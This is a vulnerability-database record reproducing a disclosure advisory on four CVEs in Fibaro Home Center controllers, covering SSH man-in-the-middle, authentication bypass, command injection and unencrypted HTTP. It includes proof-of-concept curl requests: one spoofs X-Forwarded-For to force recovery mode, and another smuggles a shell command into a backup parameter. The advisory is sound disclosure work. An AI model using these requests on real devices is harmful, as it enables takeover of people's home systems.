Fibaro Home Center Light and Fibaro Home Center 2 versions 4.600 and below suffer from man-in-the-middle, missing authentication, remote command execution, and missing encryption vulnerabilities.
{"id": "1337DAY-ID-36122", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Fibaro Home Center MITM / Missing Authentication / Code Execution Vulnerabilities", "description": "Fibaro Home Center Light and Fibaro Home Center 2 versions 4.600 and below suffer from man-in-the-middle, missing authentication, remote command execution, and missing encryption vulnerabilities.", "published": "2021-04-20T00:00:00", "modified": "2021-04-20T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36122", "reporter": "Marton Illes", "references": [], "cvelist": ["CVE-2021-20992", "CVE-2021-20991", "CVE-2021-20990", "CVE-2021-20989"], "immutableFields": [], "lastseen": "2021-12-27T13:50:11", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20989", "CVE-2021-20990", "CVE-2021-20991", "CVE-2021-20992"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162243"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": 
{"references": [{"type": "canvas", "idList": ["NGINX"]}, {"type": "cve", "idList": ["CVE-2021-20989", "CVE-2021-20990", "CVE-2021-20991", "CVE-2021-20992"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162243"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://0day.today/exploit/36122", "sourceData": "Fibaro Home Center MITM / Missing Authentication / Code Execution\n\n\n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO's headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. 250 employees.\"\n\n \n\nhttps://www.fibaro.com/en/about-us/\n\n \n\n \n\nVulnerability overview/description:\n\n-----------------------------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)\n\nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n\nremote access and remote support capabilities. This connection can be \n\nintercepted using a man-in-the-middle attack and a device initiated remote \n\nport-forward channel can be used to connect to the web management interface.\n\n\nIoT Inspector identified a disabled SSH host key check, which enables \n\nman-in-the-middle attacks.\n\n \n\nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n\ncommunication between the user and the device. As communication inside the \n\nSSH port-forward is not encrypted (see #4 on management interface), user \n\nsessions, tokens and passwords can be hijacked.\n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n\n(CVE-2021-20990)\n\nAn internal management service is accessible on port 8000 and some API \n\nendpoints could be accessed without authentication to trigger a shutdown, a \n\nreboot, or a reboot into recovery mode. 
In recovery mode, an attacker can \n\nupload firmware without authentication. (Potentially an earlier version with\n\n\nknown remote command execution vulnerability, see #3)\n\n \n\n3) Authenticated remote command execution (versions before 4.550) \n\n(CVE-2021-20991)\n\nAn authenticated user can run commands as root user using a command\ninjection \n\nvulnerability.\n\nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n\nICS Cert: https://securelist.com/fibaro-smart-home/91416/\n\n \n\n4) Unencrypted management interface (CVE-2021-20992)\n\nHome Center devices provide a web based management interface over\nunencrypted \n\nHTTP protocol. Communication between the user and the device can be \n\neavesdropped to hijack sessions, tokens, and passwords. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device.\n\n \n\n \n\nProof of concept:\n\n-----------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack\n\n \n\nHome Center devices initiate an SSH connection to the Fibaro cloud\n\n \n\n \n\n./etc/init.d/fibaro/RemoteAccess\n\n \n\n<snip>\n\nDAEMON=/usr/bin/ssh\n\n \n\n....\n\n \n\ncase \"$1\" in\n\n start)\n\n \n\n .....\n\n \n\n # get IP\n\n local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}&HW_Key=${HW_Key}\"\n\n local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d '\n!\"#$%&|'\"'\"'|()*+,/:;<=>?@[|\\\\|]|^`|\\||{}~')\n\n \n\n # get PORT\n\n local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}&HW_Key=${HW_Key}\"\n\n local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d 
'\n!\"#$%&|'\"'\"'|()*+,/:;<=>?@[|\\\\|]|^`|\\||{}~')\n\n \n\n ....\n\n \n\n start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\nremote2@\"${IP_Response}\"\n\n</snip>\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection.\nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. Once the connection is authenticated, the client initiates a\nremote \n\nport-forward:\n\n-R \"${PORT_Response}\":localhost:80\n\n \n\nThis enables the attacker to access port 80 (management interface) of the \n\ndevice.\n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n<snip>\n\nfunction handleResponse(response)\n\n responseJson = json.decode(response.data)\n\n print(json.encode(responseJson))\n\n \n\n local autoSSHCommand = 'ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip.. ':'\n.. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip\n\n os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint='\n.. serialNumber .. '&HW_Key=' .. 
HWKey\n\n print(remoteUrl)\n\n \n\n http = net.HTTPClient({timeout = 5000})\n\n \n\n http:request(remoteUrl, {\n\n options = {\n\n method = 'GET'\n\n },\n\n success = function(response)\n\n handleResponse(response)\n\n end,\n\n error = function(error)\n\n print(error)\n\n end\n\n })\n\nend\n\n \n\ngetSupportData()\n\n</snip>\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection.\n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n<snip>\n\n proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n \n\n location ~* \\.php$ {\n\n proxy_pass http://127.0.0.1:8000;\n\n }\n\n \n\n location ~* \\.php\\?.* {\n\n proxy_pass http://127.0.0.1:8000;\n\n }\n\n</snip>\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork.\n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. 
However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n<snip>\n\nfunction isLocalRequest()\n\n{\n\n $ipAddress = \"\";\n\n if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) \n\n $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];\n\n else\n\n $ipAddress = $_SERVER['REMOTE_ADDR'];\n\n \n\n $whitelist = array( '127.0.0.1', '::1' );\n\n if(in_array($ipAddress, $whitelist))\n\n return true;\n\n \n\n return false;\n\n}\n\n</snip>\n\n \n\nAs the lighttpd service is available via the network, an attacker can inject\nthe \n\nrequired header X-Forwarded-For as well.\n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n<snip>\n\n<?php\n\n require_once(\"../../authorize.php\");\n\n \n\n if (!isLocalRequest() && !isAuthorized())\n\n {\n\n sendUnauthorized();\n\n }\n\n else\n\n {\n\n exec(\"systemShutdown\");\n\n }\n\n?>\n\n</snip>\n\n \n\n./var/www/services/system/reboot.php\n\n<snip>\n\n \n\nfunction authorize() \n\n{\n\n return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n if (!isLocalRequest() && !authorize())\n\n {\n\n sendUnauthorized();\n\n return;\n\n }\n\n \n\n $params = tryDecodeJson($text);\n\n if(!is_null($params) && isset($params->recovery) && $params->recovery\n=== true)\n\n exec(\"rebootToRecovery\");\n\n else\n\n exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents('php://input');\n\n$requestMethod = $_SERVER['REQUEST_METHOD'];\n\n \n\nif ($requestMethod == \"POST\") \n\n handlePOST($requestBody);\n\nelse \n\n setStatusMethodNotAllowed();\n\n \n\n</snip>\n\n \n\nAn attacker can issue the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d\n'{\"recovery\":true}' http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, 
firmware images can be updated without authentication.\n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup & restore operations could be triggered through HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n<snip>\n\nfunction restoreBackup($params)\n\n{\n\n if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)\n\n {\n\n setStatusTooManyRequests();\n\n return;\n\n }\n\n \n\n $type = $params->type;\n\n $id = $params->id;\n\n $version = $params->version;\n\n \n\n if (is_null($id) || !is_numeric($id) || $id < 1 ) \n\n {\n\n setStatusBadRequest();\n\n return;\n\n }\n\n \n\n $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n if ($type == \"local\" && $hcVersion == \"HC2\" || $type == \"remote\") \n\n {\n\n $version ?\n\n exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '.\n$id . ' ' . $version) :\n\n exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '.\n$id);\n\n }\n\n else \n\n {\n\n setStatusBadRequest();\n\n return;\n\n }\n\n \n\n setStatusAccepted();\n\n}\n\n</snip>\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat > /tmp/exploit <<- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type:\napplication/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n<snip>\n\n $version = escapeshellarg($params->version);\n\n</snip>\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNmap shows a few open ports on the box:\n\nPORT STATE SERVICE\n\n22/tcp open ssh\n\n80/tcp open http\n\n8000/tcp open http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP.\n\n \n\n 
\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery.\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530.\n\n \n\nSolution:\n\n---------\n\nUpgrade to version 4.610 or the latest version, which fixes vulnerabilities\n1, \n\n2 and 3.\n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device.\n\n", "category": "remote exploits", "verified": true, "_state": {"dependencies": 1647589307, "score": 0}}
{"packetstorm": [{"lastseen": "2021-04-20T16:41:04", "description": "", "cvss3": {}, "published": "2021-04-20T00:00:00", "type": "packetstorm", "title": "Fibaro Home Center MITM / Missing Authentication / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-20989", "CVE-2021-20990", "CVE-2021-20991", "CVE-2021-20992"], "modified": "2021-04-20T00:00:00", "id": "PACKETSTORM:162243", "href": "https://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html", "sourceData": "`IoT Inspector Research Lab Advisory IOT-20210408-0 \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \ntitle: Multiple vulnerabilities \n \nvendor/product: Fibaro Home Center Light / Fibaro Home Center 2 \n \nhttps://www.fibaro.com/ \n \nvulnerable version: 4.600 and older \n \nfixed version: 4.610 \n \nCVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n \nCVE-2021-20992 \n \nimpact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H \n \n9.8 (critical) \nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H \n \n7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H \n \n8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H \n \nreported: 2020-11-18 \n \npublication: 2021-04-08 \n \nby: Marton Illes, IoT Inspector Research Lab \n \nhttps://www.iot-inspector.com/ \n \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \n \n \nVendor description: \n \n------------------- \n \n\"FIBARO is a global brand based on the Internet of Things technology. It \n \nprovides solutions for building and home automation. FIBARO's headquarters \n \nand factory are located in Wysogotowo, 3 miles away from Poznan. The company \n \nemploys app. 
250 employees.\" \n \n \n \nhttps://www.fibaro.com/en/about-us/ \n \n \n \n \n \nVulnerability overview/description: \n \n----------------------------------- \n \n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989) \n \nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n \nremote access and remote support capabilities. This connection can be \n \nintercepted using a man-in-the-middle attack and a device initiated remote \n \nport-forward channel can be used to connect to the web management interface. \n \n \nIoT Inspector identified a disabled SSH host key check, which enables \n \nman-in-the-middle attacks. \n \n \n \nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n \ncommunication between the user and the device. As communication inside the \n \nSSH port-forward is not encrypted (see #4 on management interface), user \n \nsessions, tokens and passwords can be hijacked. \n \n \n \n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n \n(CVE-2021-20990) \n \nAn internal management service is accessible on port 8000 and some API \n \nendpoints could be accessed without authentication to trigger a shutdown, a \n \nreboot, or a reboot into recovery mode. In recovery mode, an attacker can \n \nupload firmware without authentication. (Potentially an earlier version with \n \n \nknown remote command execution vulnerability, see #3) \n \n \n \n3) Authenticated remote command execution (versions before 4.550) \n \n(CVE-2021-20991) \n \nAn authenticated user can run commands as root user using a command \ninjection \n \nvulnerability. \n \nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n \nICS Cert: https://securelist.com/fibaro-smart-home/91416/ \n \n \n \n4) Unencrypted management interface (CVE-2021-20992) \n \nHome Center devices provide a web based management interface over \nunencrypted \n \nHTTP protocol. 
Communication between the user and the device can be \n \neavesdropped to hijack sessions, tokens, and passwords. The management \n \ninterface is only available over HTTP on the local network. The vendor \n \nrecommends using the cloud-based management interface, which is accessible \nover \n \nHTTPS and requests are forwarded via an encrypted SSH connection between the \n \n \nFibaro cloud and the device. \n \n \n \n \n \nProof of concept: \n \n----------------- \n \n1) Cloud SSH Connection Man-in-the-Middle Attack \n \n \n \nHome Center devices initiate a SSH connection to the Fibaro cloud \n \n \n \n \n \n./etc/init.d/fibaro/RemoteAccess \n \n \n \n<snip> \n \nDAEMON=/usr/bin/ssh \n \n \n \n.... \n \n \n \ncase \"$1\" in \n \nstart) \n \n \n \n..... \n \n \n \n# get IP \n \nlocal \nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria \nl}&HW_Key=${HW_Key}\" \n \nlocal IP_Response; IP_Response=$(curl -f -s -S --retry 3 \n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d ' \n!\"#$%&|'\"'\"'|()*+,/:;<=>?@[|\\\\|]|^`|\\||{}~') \n \n \n \n# get PORT \n \nlocal \nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S \nerial}&HW_Key=${HW_Key}\" \n \nlocal PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 \n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d ' \n!\"#$%&|'\"'\"'|()*+,/:;<=>?@[|\\\\|]|^`|\\||{}~') \n \n \n \n.... 
\n \n \n \nstart-stop-daemon --start --background --pidfile \"${PIDFILE}\" \n--make-pidfile --startas /usr/bin/screen \\ \n \n-- -DmS ${NAME} ${DAEMON} -y -K 30 -i \n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80 \nremote2@\"${IP_Response}\" \n \n</snip> \n \n \n \nThe device uses dropbear ssh to initiate the connection; option -y disables \nany \n \nhost-key checks, voiding much of the otherwise added transport-layer \nsecurity \n \nby SSH: \"Always accept hostkeys if they are unknown.\" \n \n \n \nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n \nlb-1.eu.ra.fibaro.com \n \n \n \nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n \nusing any hostkey, the attacker can successfully authenticate the SSH \n \nconnection. Once the connection is authenticated, the client initiates a \nremote \n \nport-forward: \n \n-R \"${PORT_Response}\":localhost:80 \n \n \n \nThis enables the attacker to access port 80 (management interface) of the \n \ndevice. \n \n \n \nA similar problem exists for remote support connections: \n \n \n \n./opt/fibaro/scripts/remote-support.lua \n \n<snip> \n \nfunction handleResponse(response) \n \nresponseJson = json.decode(response.data) \n \nprint(json.encode(responseJson)) \n \n \n \nlocal autoSSHCommand = 'ssh -y -K 30 -i \n/etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip.. ':' \n.. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip \n \nos.execute(autoSSHCommand) \n \nend \n \n \n \nfunction getSupportData() \n \nremoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' \n.. serialNumber .. '&HW_Key=' .. 
HWKey \n \nprint(remoteUrl) \n \n \n \nhttp = net.HTTPClient({timeout = 5000}) \n \n \n \nhttp:request(remoteUrl, { \n \noptions = { \n \nmethod = 'GET' \n \n}, \n \nsuccess = function(response) \n \nhandleResponse(response) \n \nend, \n \nerror = function(error) \n \nprint(error) \n \nend \n \n}) \n \nend \n \n \n \ngetSupportData() \n \n</snip> \n \n \n \nHere, the remote support endpoint returns the following data: \n \n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY \n.ZZZ\"} \n \n \n \nThe same dropbear ssh client is used with option -y. In this case, port 22 \n \n(ssh) is made accessible through the port-forward. However, the device only \n \nallows public key authentication with a hard-coded SSH key. No further \ntesting \n \nhas been done on compromising the support SSH connection. \n \n \n \n \n \n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n \n \n \nThe device is running a nginx server, which forwards some requests to a \n \nlighttpd server (8000) for further processing: \n \n<snip> \n \nproxy_set_header X-Forwarded-For \n$proxy_add_x_forwarded_for; \n \n \n \nlocation ~* \\.php$ { \n \nproxy_pass http://127.0.0.1:8000; \n \n} \n \n \n \nlocation ~* \\.php\\?.* { \n \nproxy_pass http://127.0.0.1:8000; \n \n} \n \n</snip> \n \n \n \nThe lighttpd server is not only accessible locally, but also via the local \n \nnetwork. \n \n \n \nAuthentication and authorization is implemented in PHP and there is a \nspecial \n \ncheck for connections originating from within the host. 
However, when \nchecking \n \nthe remote IP address, the header X-Forwarded-For is also considered: \n \n \n \n./var/www/authorize.php \n \n<snip> \n \nfunction isLocalRequest() \n \n{ \n \n$ipAddress = \"\"; \n \nif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) \n \n$ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR']; \n \nelse \n \n$ipAddress = $_SERVER['REMOTE_ADDR']; \n \n \n \n$whitelist = array( '127.0.0.1', '::1' ); \n \nif(in_array($ipAddress, $whitelist)) \n \nreturn true; \n \n \n \nreturn false; \n \n} \n \n</snip> \n \n \n \nAs the lighttpd service is available via the network, an attacker can inject \nthe \n \nrequired header X-Forwarded-For as well. \n \n \n \nThe check isLocalRequest is used to \"secure\" multiple endpoints: \n \n \n \n./var/www/services/system/shutdown.php \n \n<snip> \n \n<?php \n \nrequire_once(\"../../authorize.php\"); \n \n \n \nif (!isLocalRequest() && !isAuthorized()) \n \n{ \n \nsendUnauthorized(); \n \n} \n \nelse \n \n{ \n \nexec(\"systemShutdown\"); \n \n} \n \n?> \n \n</snip> \n \n \n \n./var/www/services/system/reboot.php \n \n<snip> \n \n \n \nfunction authorize() \n \n{ \n \nreturn isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, \nrole::INSTALLER)); \n \n} \n \n \n \nfunction handlePOST($text) \n \n{ \n \nif (!isLocalRequest() && !authorize()) \n \n{ \n \nsendUnauthorized(); \n \nreturn; \n \n} \n \n \n \n$params = tryDecodeJson($text); \n \nif(!is_null($params) && isset($params->recovery) && $params->recovery \n=== true) \n \nexec(\"rebootToRecovery\"); \n \nelse \n \nexec(\"systemReboot\"); \n \n} \n \n \n \n$requestBody = file_get_contents('php://input'); \n \n$requestMethod = $_SERVER['REQUEST_METHOD']; \n \n \n \nif ($requestMethod == \"POST\") \n \nhandlePOST($requestBody); \n \nelse \n \nsetStatusMethodNotAllowed(); \n \n \n \n</snip> \n \n \n \nAn attacker can issue the following HTTP request to reboot the device \ninto \n \nrecovery mode: \n \ncurl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: 
application/json' -d \n'{\"recovery\":true}' http://DEVICE:8000/services/system/reboot.php \n \n \n \nIn recovery mode, firmware images can be updated without authentication. \n \n \n \n \n \n3) Authenticated remote command execution (versions before 4.550) \n \n \n \nBackup & restore operations could be triggered through HTTP endpoints: \n \n \n \n./var/www/services/system/backups.php \n \n<snip> \n \nfunction restoreBackup($params) \n \n{ \n \nif (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0) \n \n{ \n \nsetStatusTooManyRequests(); \n \nreturn; \n \n} \n \n \n \n$type = $params->type; \n \n$id = $params->id; \n \n$version = $params->version; \n \n \n \nif (is_null($id) || !is_numeric($id) || $id < 1 ) \n \n{ \n \nsetStatusBadRequest(); \n \nreturn; \n \n} \n \n \n \n$hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\"); \n \n \n \nif ($type == \"local\" && $hcVersion == \"HC2\" || $type == \"remote\") \n \n{ \n \n$version ? \n \nexec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. \n$id . ' ' . $version) : \n \nexec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
\n$id); \n \n} \n \nelse \n \n{ \n \nsetStatusBadRequest(); \n \nreturn; \n \n} \n \n \n \nsetStatusAccepted(); \n \n} \n \n</snip> \n \n \n \nThe parameter $version is not sanitized or escaped, which allows an attacker \nto \n \ninject shell commands into the exec() call: \n \n \n \ncat > /tmp/exploit <<- EOM \n \n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1; \nINJECTED COMMAND\"}} \n \nEOM \n \n \n \ncurl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: \napplication/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php \n \n \n \n \nVersion 4.550 and later have proper escaping: \n \n<snip> \n \n$version = escapeshellarg($params->version); \n \n</snip> \n \n \n \n \n \n4) Unencrypted management interface \n \n \n \nNmap shows a few open ports on the box: \n \nPORT STATE SERVICE \n \n22/tcp open ssh \n \n80/tcp open http \n \n8000/tcp open http-alt \n \n \n \nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n \n \n \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \n \n \nVulnerable / tested versions: \n \n----------------------------- \n \nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest \nversion \n \nat the time of the discovery. \n \nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530. \n \n \n \nSolution: \n \n--------- \n \nUpgrade to version 4.610 or the latest version, which fixes vulnerabilities \n1, \n \n2 and 3. \n \n \n \nVulnerability 4 is not fixed as the vendor assumes that the local network is \n \n \ntrusted and the device only provides wired network access. Furthermore, the \n \nvendor recommends using the cloud-based management interface, which is \n \naccessible over HTTPS and requests are forwarded via an encrypted SSH \n \nconnection between the Fibaro cloud and the device. 
\n \n \n \n \n \nAdvisory URL: \n \n------------- \n \nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/ \n \n \n \n \n \nVendor contact timeline: \n \n------------------------ \n \n2020-11-18: Contacting Fibaro through support@fibaro.com, \n \nsupport-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com \n \n2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on \nLinkedIn \n \n2020-11-24: Advisory sent to Fibaro by email \n \n2020-12-01: Fibaro confirmed the receipt of the advisory \n \n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes \n \n2021-03-16: Fibaro beta release (4.601) with the fixes \n \n2021-03-24: Fibaro applies for CVE numbers \n \n2021-03-31: Fibaro GA release (4.610) with the fix \n \n2021-04-08: IoT Inspector Research Lab publishes advisory \n \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \n \n \nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n \n \n \nIoT Inspector is a platform for automated security analysis and compliance \n \nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n \norder to discover vulnerabilities and vulnerability patterns within IoT \ndevices \n \nand to further enhance automated identification that allows for scalable \n \ndetection within IoT Inspector, we conduct excessive security research in \nthe \n \narea of IoT. \n \n \n \nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n \nfirmware, we aim to responsibly disclose relevant information to the vendor \n \nof the affected IoT device as well as the general public in a way that \n \nminimizes potential harm and encourages further security analyses of IoT \n \nsystems. 
\n \n \n \nYou can find our responsible disclosure policy here: \n \nhttps://www.iot-inspector.com/responsible-disclosure-policy/ \n \n \n \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \n \n \nInterested in using IoT Inspector for your research or product? \n \n \n \nMail: research at iot-inspector dot com \n \nWeb: https://www.iot-inspector.com \n \nBlog: https://www.iot-inspector.com/blog/ \n \nTwitter: https://twitter.com/iotinspector \n \n \n \nEOF Marton Illes / @2021 \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162243/IOT-20210408-0.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T13:31:42", "description": "In Fibaro Home Center 2 and Lite devices in all versions provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, 